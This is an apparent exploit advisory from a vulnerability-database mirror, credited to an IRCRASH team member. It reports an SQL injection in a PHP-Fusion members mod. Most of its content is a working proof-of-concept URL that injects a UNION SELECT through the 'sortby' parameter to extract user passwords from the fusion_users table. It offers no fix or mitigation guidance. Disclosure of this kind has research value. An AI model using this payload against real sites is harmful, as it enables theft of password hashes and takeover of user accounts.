Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21123
HistoryJan 11, 2009 - 12:00 a.m.

PHP-Fusion Mod Members Bewerb Sql Injection

2009-01-1100:00:00
vulners.com
20

#####################################################################################

PHP-Fusion Mod Members Bewerb Sql Injection

#####################################################################################

#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################

#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=204

#Dork : :( #

#####################################################################################

[Bug]

#http://Site/[path]/members.php?sortby=%'%20union%20select%200,user_password,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20fusion_users/*

#You must login then use bug . #

#####################################################################################

Site : Http://IRCRASH.COM

###################################### TNX GOD ######################################